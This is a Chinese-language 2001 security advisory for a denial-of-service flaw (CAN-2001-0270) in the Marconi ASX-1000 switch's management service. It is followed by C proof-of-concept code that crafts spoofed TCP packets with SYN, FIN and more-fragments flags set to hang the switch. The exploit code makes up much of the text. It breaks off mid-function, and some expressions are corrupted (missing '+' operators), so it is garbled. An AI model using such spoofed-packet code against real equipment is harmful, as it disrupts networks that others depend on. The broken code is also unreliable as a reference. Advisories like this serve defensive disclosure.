Marconi ASX-1000 交换机管理拒绝服务漏洞

发布日期：2001-02-26
更新日期：2001-02-26

受影响系统：

Marconi ForeThought 6.2
- MandrakeSoft Linux Mandrake 7.2
- MandrakeSoft Linux Mandrake 7.1
- MandrakeSoft Corporate Server 1.0.1

描述：

---

BUGTRAQ ID: 2400
CVE(CAN) ID: CAN-2001-0270

Marconi公司出品的ASX-1000交换机是一款适用于在ATM网络进行3层交换的交换机。
它存在一个拒绝服务的问题。远程攻击者可能通过发送恶意的报文导致管理员不能
远程对交换机进行管理访问。

如果一个报文同时设置了SYN_FIN以及分片标志，交换机在收到这样的报文时，其
用于交换机管理的服务程序会进入close_wait状态，必须重设端口或者重开电源才
能恢复正常工作。

<* 来源：Keith Pachulski （keith.pachulski@corp.ptd.net) *>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

J.K. Garvey (jim@trig.org)提供了如下演示代码：

/*
This DoS attack was discovered by Keith Pachulski and written by J.K.
Garvey. This simple program sets the SYN, FIN and More Fragment bits and
sends this crafted packet from a spoofed host to a destined Fore/Marconi
ASX switch, which causes it to crash. I have no idea if this works, but it
does what Keith Pachulski described.
*/

#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <string.h>
#include <unistd.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <linux/ip.h>
#include <linux/tcp.h>

#define IP_MF 0x2000 /* More fragment bits */

void forge (unsigned int, unsigned int, unsigned short);
unsigned short in_cksum (unsigned short *, int);
unsigned int host_convert (char *);
void usage (char *);

main (int argc, char **argv)
{
unsigned int source_host = 0, dest_host = 0;
unsigned short source_port = 0, dest_port = 80;
int input;
char desthost[16], srchost[16];

printf ("\nDenial of Service attack for Fore/Marconi ASX Switches\n");
printf
("Found by Keith Pachulski <keithp@corp.ptd.net>\nExploit written by J.K. Garvey <jim@trig.org>\n");

if (getuid () != 0)
{
printf
("\nRoot is required. Duh.\n");
exit (0);
}

if (argc < 5)
{
usage (argv[0]);
exit (0);
}

while ((input = getopt (argc, argv, "s:d:p:")) != -1)
{
switch (input)
{
case 's':
source_host = host_convert (optarg);
strncpy (srchost, optarg, 16);
break;

case 'd':
dest_host = host_convert (optarg);
strncpy (desthost, optarg, 16);
break;

case 'p':
dest_port = atoi(optarg);
break;
}
}

forge (source_host, dest_host, dest_port);
printf ("\nCrafted packet sent!\n");

exit (0);
}

void
forge (unsigned int source_addr, unsigned int dest_addr, unsigned short dest_port)
{
struct send
{
struct iphdr ip;
struct tcphdr tcp;
}
send;

/* From synhose.c by knight */
struct pseudo_header
{
unsigned int source_address;
unsigned int dest_address;
unsigned char placeholder;
unsigned char protocol;
unsigned short tcp_length;
struct tcphdr tcp;
}
pseudo_header;

int ch;
int send_socket;
int recv_socket;
struct sockaddr_in sin;
char *input;

srand ((getpid ()) * (dest_port));

/* Begin forged IP header */
send.ip.ihl = 5;
send.ip.version = 4;
send.ip.tos = 0;
send.ip.tot_len = htons (40);
send.ip.id = (int) (255.0 * rand () / (RAND_MAX 1.0));

/* Note more fragments bit has been set */
send.ip.frag_off = htons (IP_MF);

send.ip.ttl = 64;
send.ip.protocol = IPPROTO_TCP;
send.ip.check = 0;
send.ip.saddr = source_addr;
send.ip.daddr = dest_addr;

/* Begin forged TCP header */
send.tcp.source = 1 (int) (25.0 * rand () / (RAND_MAX 1.0));

文章整理：西部数码--专业提供域名注册、虚拟主机服务
http://www.west263.com
以上信息与文章正文是不可分割的一部分,如果您要转载本文章,请保留以上信息，谢谢!